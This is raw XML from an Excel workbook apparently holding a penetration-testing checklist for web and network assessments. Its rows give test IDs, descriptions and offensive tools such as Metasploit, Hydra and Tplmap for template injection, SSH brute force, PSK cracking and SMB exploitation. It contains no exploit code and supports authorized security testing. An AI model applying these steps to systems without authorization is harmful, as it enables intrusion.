  <si>
    <t>OTG-INPVAL-019</t>
  </si>
  <si>
    <t>Testing for Server Side Template Injection</t>
  </si>
  <si>
    <t>Check user inputs embedded in a template in server side technologies like Jinja2, Twig, Freemaker if they are unsafe and could lead to RCE or not</t>
  </si>
  <si>
    <t>Tplmap, Burp Suite(Backslash extension), Template expression test strings/payload list</t>
  </si>
  <si>
    <t>Nikto, Zed Attack Proxy</t>
  </si>
  <si>
    <t>Burp Suite, Zed Attack Proxy</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET, Bletchley</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Curl, grep, Identity Finder, TCPDump</t>
  </si>
  <si>
    <t>OTG-CRYPST-004</t>
  </si>
  <si>
    <t>Testing for Weak Encryption</t>
  </si>
  <si>
    <t>Check the encryption algorithm being used such as minimum key length, proper parameters</t>
  </si>
  <si>
    <t>Nessus(To scan for SNMP,TLS,SSH), Fortify,Coverity(For static code analysis)</t>
  </si>
  <si>
    <t>Burp Suite, Metasploit, MSFVenom, ZipBomb</t>
  </si>
  <si>
    <t>Test Browser Storage</t>
  </si>
  <si>
    <t>Test if the web application is storing any sensitive data in client-side storage</t>
  </si>
  <si>
    <t>Test Session Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the WebStorage API</t>
  </si>
  <si>
    <t>Browser, ZAP</t>
  </si>
  <si>
    <t>Test IndexedDB</t>
  </si>
  <si>
    <t>Check for Cryptokeys in IndexedDB and check if they are set as extractable:true when they should be extractable:false                           Also check if the web application is using WEB Sql which it should not be using</t>
  </si>
  <si>
    <t>Test Cookies</t>
  </si>
  <si>
    <t>Determine if the cookies can be exploited to gain access to other users and admin roles</t>
  </si>
  <si>
    <t>OTG-CLIENT-013</t>
  </si>
  <si>
    <t>Testing for Cross Site Script Inclusion</t>
  </si>
  <si>
    <t>Similar to Cross Site Request Forgery. Determine whether sensitive data can be leaked using JavaScript via global variables, global function parameters, Runtime errors</t>
  </si>
  <si>
    <t>Network Security Checklist</t>
  </si>
  <si>
    <t>NES-INFO-001</t>
  </si>
  <si>
    <t>NES-INFO-002</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Routers, IP Addresses, MAC Addresses</t>
  </si>
  <si>
    <t>Fingerprinting the server</t>
  </si>
  <si>
    <t>Detect the Operating System running on servers, Identify the open ports and services on them</t>
  </si>
  <si>
    <t>NES-CONFIG-001</t>
  </si>
  <si>
    <t>NES-CONFIG-002</t>
  </si>
  <si>
    <t>Test VPN infrastructure</t>
  </si>
  <si>
    <t>Understand the VPN infrastructure and the architecture it follows</t>
  </si>
  <si>
    <t>Nmap, Ipsecscan</t>
  </si>
  <si>
    <t>NES-VAPT-001</t>
  </si>
  <si>
    <t>Assess the SSL certificates and configuration. That is check for SSL version, Hashing algorithm, Use of cipher, Logjam issue, Sweet32 vulnerability, Certificate expiration, OpenSSL ChangeCipherSec issue, POODLE vulnerability, OpenSSL Heartbled issue</t>
  </si>
  <si>
    <t>Nessus, Browser</t>
  </si>
  <si>
    <t>NES-VAPT-002</t>
  </si>
  <si>
    <t>Test Domain Names</t>
  </si>
  <si>
    <t>Examine the Domain Name System server for zone transfer, DNS amplification attack, Banner grabbing</t>
  </si>
  <si>
    <t>dnsenum, dig, nslookup, nmap</t>
  </si>
  <si>
    <t>NES-VAPT-003</t>
  </si>
  <si>
    <t>Assess the SMTP open relay and check for email spoofing, username enumeration, blockage of modified cryptors</t>
  </si>
  <si>
    <t>nmap, Burp Suite</t>
  </si>
  <si>
    <t>NES-VAPT-004</t>
  </si>
  <si>
    <t>Assess SSL</t>
  </si>
  <si>
    <t>Assess SMTP(25) TCP</t>
  </si>
  <si>
    <t>Assess SNMP(161) UDP</t>
  </si>
  <si>
    <t>Check for default community strings 'public' and 'private', Perform MIG enumeration</t>
  </si>
  <si>
    <t>snmpwalk, snmpenum.pl script</t>
  </si>
  <si>
    <t>NES-VAPT-005</t>
  </si>
  <si>
    <t>Assess SSH(22) TCP</t>
  </si>
  <si>
    <t>Check if sshv1 is supported or not, check if it can be bruteforced, Check support of Weak CBC cipher and HMAC algorithm</t>
  </si>
  <si>
    <t>Hydra, Medusa, ssh2-enum-algos.nse nmap script</t>
  </si>
  <si>
    <t>NSE-VAPT-006</t>
  </si>
  <si>
    <t>Assess CISCO VPN(500) UDP</t>
  </si>
  <si>
    <t>Check for VPN group and check if credentials can be gained via cracking PSK</t>
  </si>
  <si>
    <t>ikescan, ikeprobe</t>
  </si>
  <si>
    <t>NSE-VAPT-007</t>
  </si>
  <si>
    <t>Assess SMB(445,137,139) TCP</t>
  </si>
  <si>
    <t>Check the Samba service version and if it can exploited</t>
  </si>
  <si>
    <t>Metasploit, smb-check-vulns nmap script</t>
  </si>
  <si>
    <t>NSE-VAPT-008</t>
  </si>
  <si>
    <t>Assess FTP(21,22) TCP</t>
  </si>
  <si>
    <t>Check if anonymous access is allowed, Assess if any sensitive information can be accessed</t>
  </si>
  <si>
    <t>nmap, Hydra, ExploitDB</t>
  </si>
  <si>
    <t>Service Assessment</t>
  </si>
  <si>
    <t>Network RF Testing(if any)</t>
  </si>
  <si>
    <t>Scan for Radio frequencies from hardware and try to identify more about the hardware and see if it can be exploited, Demodulate the signal to extract communication, Check if a device can be impersonated as other device</t>
  </si>
  <si>
    <t>USRP2(to capture radio frequencies), Spread Spectrum techniques, GNU Radio</t>
  </si>
  <si>
    <t>NES-NC-001</t>
  </si>
  <si>
    <t>NES-NC-002</t>
  </si>
  <si>
    <t>Network Communication Assessment</t>
  </si>
  <si>
    <t>Network Protocol Testing</t>
  </si>
  <si>
    <t>Capture sample communications, check if communication between devices can be initiated as an attacker</t>
  </si>
  <si>
    <t>Wireshark, Tshark</t>
  </si>
  <si>
    <t>NES-NC-003</t>
  </si>
  <si>
    <t>Network Protocol Cryptanlysis</t>
  </si>
  <si>
    <t>Identify the cryptographic algorithm being used and key length to determine if there are  any vulnerabilites which can be exploited, Perform entropy analysis to determine encrpytion of data</t>
  </si>
  <si>
    <t>NES-NC-004</t>
  </si>
  <si>
    <t>Protocol Decoding and Protocol Enumeration</t>
  </si>
  <si>
    <t>Reverse engineer the network capture to identify any unknown protocol type, Assess if the protocol can be enumerated in any kind of way</t>
  </si>
  <si>
    <t>Wireshark, Netcat</t>
  </si>
  <si>
    <t>NES-NC-005</t>
  </si>
  <si>
    <t>Network Protocol Fuzzing and Exploitation</t>
  </si>
  <si>
    <t>Send both valid and invalid communication to both endpoints of communication link and search for anomalies, such as replaying data, MITM attacks, DOS attacks, Determine feasible attacks which can be launched on the network nodes</t>
  </si>
  <si>
    <t>Ion Cannon, Python scripts, Spoofing firmware update, Disconnection of signals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</si>
</sst>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0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="4">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s>
  <borders count="1">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="22">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="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2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="158">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relative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indexed="23"/>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relative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494EE13-582E-4180-8331-9BA3F3D66C21}" name="Table1" displayName="Table1" ref="A5:F15" totalsRowShown="0" headerRowDxfId="113">
  <autoFilter ref="A5:F15" xr:uid="{4EDC3F2A-2175-4541-AC1D-64DF54DFEC39}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{04CAD40B-FCAD-49A7-B4C0-41E0D7B71C06}" name="Information Gathering" dataDxfId="112"/>
    <tableColumn id="2" xr3:uid="{59C44EAE-3AF4-485A-A2E7-1176164A96BC}" name="Test Name" dataDxfId="111"/>
    <tableColumn id="3" xr3:uid="{94771283-495B-4946-93A8-AB85B69DF56C}" name="Description" dataDxfId="110"/>
    <tableColumn id="4" xr3:uid="{DD71763B-C0A3-4211-B3DE-A73318B353F3}" name="Tools" dataDxfId="109"/>
    <tableColumn id="5" xr3:uid="{83FA2607-9905-4671-9D79-4EC72E3A590A}" name="Result" dataDxfId="108"/>
    <tableColumn id="6" xr3:uid="{4CAFBEA5-0A34-48CC-B682-5C1AEE754D45}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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E549216-25C0-4D0A-9B05-A22EE0537AE2}" name="Table61415" displayName="Table61415" ref="A103:F107" totalsRowShown="0" headerRowDxfId="59">
  <autoFilter ref="A103:F107" xr:uid="{29F22A1A-190C-433A-BC42-C344C797C0DD}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{38D3DD47-D887-4910-8282-CD7068982B56}" name="Cryptography" dataDxfId="58"/>
    <tableColumn id="2" xr3:uid="{655F1B99-2112-49ED-AB5C-72112515AC30}" name="Test Name" dataDxfId="57"/>
    <tableColumn id="3" xr3:uid="{28654E59-81F0-4272-8A1C-DE77B88BC954}" name="Description" dataDxfId="56"/>
    <tableColumn id="4" xr3:uid="{0C6EC9F8-5547-4ADA-B0F9-13D81BA4A536}" name="Tools" dataDxfId="55"/>
    <tableColumn id="5" xr3:uid="{5089414E-3FC0-4A8E-9D29-938DE28D6377}" name="Result" dataDxfId="54"/>
    <tableColumn id="6" xr3:uid="{545798D2-605B-4169-86C8-B81A9900BEC2}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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5F74D29A-3F29-45E4-A6AA-1069A16275D0}" name="Table616" displayName="Table616" ref="A120:F137" totalsRowShown="0" headerRowDxfId="53">
  <autoFilter ref="A120:F137" xr:uid="{B92FF595-B85A-420F-B4D2-2D071974E7EB}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{9AACD2F7-0BB1-429C-A602-202038A9E52C}" name="Client Side Testing" dataDxfId="52"/>
    <tableColumn id="2" xr3:uid="{A2D9640A-50C2-46B4-959E-97C0DC2B81F2}" name="Test Name" dataDxfId="51"/>
    <tableColumn id="3" xr3:uid="{448BE50F-D9FF-4B58-96E6-6B8F3753535B}" name="Description" dataDxfId="50"/>
    <tableColumn id="4" xr3:uid="{D6B369EB-EFFE-447F-9D32-6D9EBACAC4D6}" name="Tools" dataDxfId="49"/>
    <tableColumn id="5" xr3:uid="{9D3D13AB-103E-46F9-9211-1B096F62A925}" name="Result" dataDxfId="48"/>
    <tableColumn id="6" xr3:uid="{DCF0784E-3513-488C-ADEB-2D07C334E6F8}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight1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393CE09-416B-4451-B36B-3A8FA8D64DCF}" name="Table17" displayName="Table17" ref="A5:F7" totalsRowShown="0" headerRowDxfId="23">
  <autoFilter ref="A5:F7" xr:uid="{CB36C19E-DD6A-4C5C-A928-7387CBE49B18}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{ED21752C-0544-43BA-8D85-BC37E25DB0A1}" name="Information Gathering" dataDxfId="22"/>
    <tableColumn id="2" xr3:uid="{E7BA37F5-F1F6-4DAE-94D4-5F372ED51AB7}" name="Test Name" dataDxfId="21"/>
    <tableColumn id="3" xr3:uid="{C56D3CDD-F895-4C05-B4FF-6EDA8C42E1E8}" name="Description" dataDxfId="20"/>
    <tableColumn id="4" xr3:uid="{584ED865-86C7-4E13-BF6D-9BDAA85E989C}" name="Tools" dataDxfId="19"/>
    <tableColumn id="5" xr3:uid="{39196D89-1B0B-4252-91EC-D4607872E7BC}" name="Result" dataDxfId="18"/>
    <tableColumn id="6" xr3:uid="{1BB502A6-8DDA-4EE7-AF46-B57E6FFE3661}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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B1F5A1C-2D8B-4ECB-BA75-32F58F4A7719}" name="Table28" displayName="Table28" ref="A9:F11" totalsRowShown="0" headerRowDxfId="17">
  <autoFilter ref="A9:F11" xr:uid="{141B1549-66DD-4980-8024-287FA4CC131B}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{C776FAD5-AECF-4D52-93C2-DD5A076BF4A8}" name="Configuration and Deploy Management Testing" dataDxfId="16"/>
    <tableColumn id="2" xr3:uid="{209C9EF4-1F79-476E-B12C-B98407726C1D}" name="Test Name" dataDxfId="15"/>
    <tableColumn id="3" xr3:uid="{1500EB3A-3C63-4CA2-8927-066F06AC4755}" name="Description" dataDxfId="14"/>
    <tableColumn id="4" xr3:uid="{15B3C8DD-0CC5-4F75-8D14-29E81AAC72F4}" name="Tools" dataDxfId="13"/>
    <tableColumn id="5" xr3:uid="{390CCED7-9BEE-48F8-BBAE-983866F79CF2}" name="Result" dataDxfId="12"/>
    <tableColumn id="6" xr3:uid="{DF096129-65DD-486C-8608-92336BC5CAC5}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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DE829E-332C-40A8-9FDF-BBECAAE95F64}" name="Table2911" displayName="Table2911" ref="A13:F21" totalsRowShown="0" headerRowDxfId="11">
  <autoFilter ref="A13:F21" xr:uid="{87FB70E5-7BA5-435B-AC6E-D093E7559C57}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{4E0E1C80-04FF-4FBA-9894-81AB79137517}" name="Service Assessment" dataDxfId="10"/>
    <tableColumn id="2" xr3:uid="{CE9D7554-C572-4E14-9420-FA0471A3A311}" name="Test Name" dataDxfId="9"/>
    <tableColumn id="3" xr3:uid="{FABABC28-DB8C-47D6-99DC-06A5A899AB56}" name="Description" dataDxfId="8"/>
    <tableColumn id="4" xr3:uid="{B921716B-1804-4704-A367-4EBDCAE7A1C9}" name="Tools" dataDxfId="7"/>
    <tableColumn id="5" xr3:uid="{42058E55-0EDD-4E63-9AE7-E8D008BA753F}" name="Result" dataDxfId="6"/>
    <tableColumn id="6" xr3:uid="{2791D2AF-46C8-4BE2-A072-1BEBF309EEAB}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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6B5ACC8-D7E5-4E6C-A607-32FD5AC5768A}" name="Table291124" displayName="Table291124" ref="A23:F28" totalsRowShown="0" headerRowDxfId="5">
  <autoFilter ref="A23:F28" xr:uid="{D7F0D331-AB8E-47EF-A5A9-D34FA9DE44F7}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{AABE55D7-91DD-4A84-8246-BA3FD7CF2117}" name="Network Communication Assessment" dataDxfId="4"/>
    <tableColumn id="2" xr3:uid="{F3A33BAB-F412-4009-9980-B26FE4D621D7}" name="Test Name" dataDxfId="3"/>
    <tableColumn id="3" xr3:uid="{44A87735-58EC-4FB7-A63C-0A135276C129}" name="Description" dataDxfId="2"/>
    <tableColumn id="4" xr3:uid="{9DB08FEF-B01A-461B-81BB-24D5E7C117EE}" name="Tools" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{13009901-C272-4C12-BC4F-85079E4B18DC}" name="Result" dataDxfId="0"/>
    <tableColumn id="6" xr3:uid="{B97A3CCC-2FC6-42EA-A1B2-0F4ACF5CF73A}" name="Remark"/>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0B1172A-AE4E-4E07-BC22-41EB6B6D08FC}" name="Table2" displayName="Table2" ref="A17:F28" totalsRowShown="0" headerRowDxfId="107">
  <autoFilter ref="A17:F28" xr:uid="{DE77F721-8F7C-4AE1-BEE5-F389DAE60476}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{BEEC1D1D-107B-4080-96A9-345568A437D9}" name="Configuration and Deploy Management Testing" dataDxfId="106"/>
    <tableColumn id="2" xr3:uid="{D8687F00-6AED-44D2-B849-70FC2F2B90E8}" name="Test Name" dataDxfId="105"/>
    <tableColumn id="3" xr3:uid="{188B1AA5-6570-4912-AD95-6B359E4C5FEE}" name="Description" dataDxfId="104"/>
    <tableColumn id="4" xr3:uid="{A751FCD8-7714-47E0-A88A-375F0FD69ADC}" name="Tools" dataDxfId="103"/>
    <tableColumn id="5" xr3:uid="{3A1258AD-1753-4439-8E0C-C96FD18FBA54}" name="Result" dataDxfId="102"/>
    <tableColumn id="6" xr3:uid="{655E5000-1485-4407-9DC5-FD7C77AB56A2}" name="Remark"/>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DC4E679-E450-496F-AC48-3EFA78CF303D}" name="Table3" displayName="Table3" ref="A39:F49" totalsRowShown="0" headerRowDxfId="101">
  <autoFilter ref="A39:F49" xr:uid="{D966CE3C-36D5-46D6-90AC-60C2F0629522}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{6FD15781-FE9F-465C-AAAA-20CC685AF4BA}" name="Authentication Testing" dataDxfId="100"/>
    <tableColumn id="2" xr3:uid="{FF37A5CA-29E9-4FA7-BFBC-9E5FB9D9CAE9}" name="Test Name" dataDxfId="99"/>
    <tableColumn id="3" xr3:uid="{5DDDED4C-2756-4B1A-8259-D6E56A163239}" name="Description" dataDxfId="98"/>
    <tableColumn id="4" xr3:uid="{74E886FC-C050-4FC9-A1D4-609C807F3476}" name="Tools" dataDxfId="97"/>
    <tableColumn id="5" xr3:uid="{83E35D92-114A-4F04-BCB6-383FCF6A484A}" name="Result" dataDxfId="96"/>
    <tableColumn id="6" xr3:uid="{BF02754E-B441-4F97-9F15-D996E5124E42}" name="Remark"/>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05A6DA3-BD66-434E-8A97-2809C3C0E1C1}" name="Table4" displayName="Table4" ref="A57:F65" totalsRowShown="0" headerRowDxfId="95">
  <autoFilter ref="A57:F65" xr:uid="{93F47000-AF99-452D-AD22-221FB2B1FA31}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{4D70B77E-1BAE-46BA-A3CF-DFB7A3ABB3EA}" name="Session Management Testing" dataDxfId="94"/>
    <tableColumn id="2" xr3:uid="{3BA9B76D-3477-47E4-B953-B89364D3FD74}" name="Test Name" dataDxfId="93"/>
    <tableColumn id="3" xr3:uid="{1EA87CA3-E620-4246-94BF-8389724BD870}" name="Description" dataDxfId="92"/>
    <tableColumn id="4" xr3:uid="{42CEC4DF-8056-4388-BA83-20F7537AB3FA}" name="Tools" dataDxfId="91"/>
    <tableColumn id="5" xr3:uid="{C74D0DF2-31E4-440D-8FA0-31D4BFD736C4}" name="Result" dataDxfId="90"/>
    <tableColumn id="6" xr3:uid="{3B81CF5E-6514-4E66-8960-C7BBDD647E50}" name="Remark"/>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59C928A-0252-4F60-ACEF-6069191249ED}" name="Table5" displayName="Table5" ref="A51:F55" totalsRowShown="0" headerRowDxfId="89">
  <autoFilter ref="A51:F55" xr:uid="{17642BF7-8D8C-4278-B268-28698FCA94DD}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{2B001087-6411-4162-BA4C-A1D4D6C3AE05}" name="Authorization Testing " dataDxfId="88"/>
    <tableColumn id="2" xr3:uid="{CDC19C82-BA87-4F5E-8B86-01A66B056B5B}" name="Test Name" dataDxfId="87"/>
    <tableColumn id="3" xr3:uid="{2B0F93A7-8572-4BFD-8EB2-108F3D362A9E}" name="Description" dataDxfId="86"/>
    <tableColumn id="4" xr3:uid="{683A29FA-2E55-44FA-A787-346344141FF1}" name="Tools" dataDxfId="85"/>
    <tableColumn id="5" xr3:uid="{8ECDB6E7-AEF5-435A-890C-0E37A1698722}" name="Result" dataDxfId="84"/>
    <tableColumn id="6" xr3:uid="{25F0AE6E-6797-48DC-81D2-32203A71AF5B}" name="Remark"/>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79AECF3-A199-455B-8A76-B1CFC2BE7418}" name="Table6" displayName="Table6" ref="A109:F118" totalsRowShown="0" headerRowDxfId="83">
  <autoFilter ref="A109:F118" xr:uid="{D068F599-DC81-471A-B51F-80A5DEC9F2C6}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{A0A662E9-3E08-4F4A-9723-6DB3C814AB61}" name="Business logic Testing" dataDxfId="82"/>
    <tableColumn id="2" xr3:uid="{DDFFDCFD-77D5-4BDB-B522-BE5415DBFA27}" name="Test Name" dataDxfId="81"/>
    <tableColumn id="3" xr3:uid="{9A0EE474-A5C4-499B-8F9D-3956E877838F}" name="Description" dataDxfId="80"/>
    <tableColumn id="4" xr3:uid="{4E47F9C9-16E3-4DCD-B6BA-2764D378572D}" name="Tools" dataDxfId="79"/>
    <tableColumn id="5" xr3:uid="{5FE30384-8FC1-4AD8-B502-AEB2F89162FC}" name="Result" dataDxfId="78"/>
    <tableColumn id="6" xr3:uid="{B97171CD-7926-486D-92A7-0B2C63134D32}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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FB59156F-9E3C-41C7-B722-2714F710944E}" name="Table9" displayName="Table9" ref="A67:F97" totalsRowShown="0" headerRowDxfId="77">
  <autoFilter ref="A67:F97" xr:uid="{DE1C8793-27D7-4350-8B5C-983DE77FFD8C}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{EBE7A659-E022-4C73-87FD-219FC5182844}" name="Data Validation Testing" dataDxfId="76"/>
    <tableColumn id="2" xr3:uid="{B50F9E3F-597C-4B5B-BC27-2B1410998CB4}" name="Test Name" dataDxfId="75"/>
    <tableColumn id="3" xr3:uid="{7BEABA8D-1EB8-4363-9C23-795733CDBD61}" name="Description" dataDxfId="74"/>
    <tableColumn id="4" xr3:uid="{C1261E06-682D-4B73-988C-C7D12C386271}" name="Tools" dataDxfId="73"/>
    <tableColumn id="5" xr3:uid="{E3CC6042-D8AE-4725-A172-BE7FCD8F34F2}" name="Result" dataDxfId="72"/>
    <tableColumn id="6" xr3:uid="{4DFD55D7-AD44-406D-85AE-25C0012A48F3}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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6705EB7-B555-44D8-865E-F34B4E2FB03D}" name="Table29" displayName="Table29" ref="A30:F37" totalsRowShown="0" headerRowDxfId="71">
  <autoFilter ref="A30:F37" xr:uid="{98999F3A-97A7-4DA0-8C36-A6AD8274C072}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{CA022C47-1EA1-4F3D-8068-DAD0B24FD653}" name="Identity Management Testing" dataDxfId="70"/>
    <tableColumn id="2" xr3:uid="{48FE5661-73DA-46EA-8F2B-BDE37CC63F84}" name="Test Name" dataDxfId="69"/>
    <tableColumn id="3" xr3:uid="{E04CB317-EFF9-49B6-B8B9-682E3C1A033B}" name="Description" dataDxfId="68"/>
    <tableColumn id="4" xr3:uid="{F915FB81-DEB8-4226-BC2B-9720D7AB70F5}" name="Tools" dataDxfId="67"/>
    <tableColumn id="5" xr3:uid="{AA9E5AF6-3382-41A4-90EC-28782861C661}" name="Result" dataDxfId="66"/>
    <tableColumn id="6" xr3:uid="{9D3B4DA5-187E-4AEC-A089-7316F0E55917}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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56B59D1-6722-4C1D-AA5F-578020A5FED8}" name="Table614" displayName="Table614" ref="A99:F101" totalsRowShown="0" headerRowDxfId="65">
  <autoFilter ref="A99:F101" xr:uid="{AF4C3BF2-68A6-4125-8A22-F13E8BAE0D69}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{3B642854-8D8A-4F8B-8EDF-71F6BB7F2433}" name="Error Handling" dataDxfId="64"/>
    <tableColumn id="2" xr3:uid="{A4B5240F-50C6-4832-890C-8C7219F1B923}" name="Test Name" dataDxfId="63"/>
    <tableColumn id="3" xr3:uid="{BFA4E366-167E-4837-8620-E3431F6AC262}" name="Description" dataDxfId="62"/>
    <tableColumn id="4" xr3:uid="{AF0F50BF-6CF4-4AE7-87F5-CE4F452C688C}" name="Tools" dataDxfId="61"/>
    <tableColumn id="5" xr3:uid="{ACC5AD7B-E11D-48F5-B983-8F365A3F8348}" name="Result" dataDxfId="60"/>
    <tableColumn id="6" xr3:uid="{FBEAC32E-19D5-402D-99CF-8B70A1C43A5A}" name="Remark"/>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2.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table15.xml"/><Relationship Id="rId4"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F1B90-B04A-4082-905B-58EE44062E40}">
  <dimension ref="A1:F137"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A17" workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="44.33203125" customWidth="1"/>
    <col min="2" max="3" width="51.33203125" customWidth="1"/>
    <col min="4" max="4" width="50.6640625" customWidth="1"/>
    <col min="5" max="5" width="18" customWidth="1"/>
    <col min="6" max="6" width="47.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A1" s="20" t="s">
        <v>311</v>
      </c>
      <c r="B1" s="21"/>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A2" s="21"/>
      <c r="B2" s="21"/>
    </row>
    <row r="5" spans="1:6" s="3" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A5" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A6" s="3" t="s">
        <v>6</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>7</v>
      </c>
      <c r="C6" s="5" t="s">
        <v>8</v>
      </c>
      <c r="D6" s="6" t="s">
        <v>312</v>
      </c>
      <c r="E6" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="35.4" x14ac:dyDescent="0.3">
      <c r="A7" s="3" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>11</v>
      </c>
      <c r="C7" s="8" t="s">
        <v>12</v>
      </c>
      <c r="D7" s="6" t="s">
        <v>313</v>
      </c>
      <c r="E7" s="7" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A8" s="3" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>14</v>
      </c>
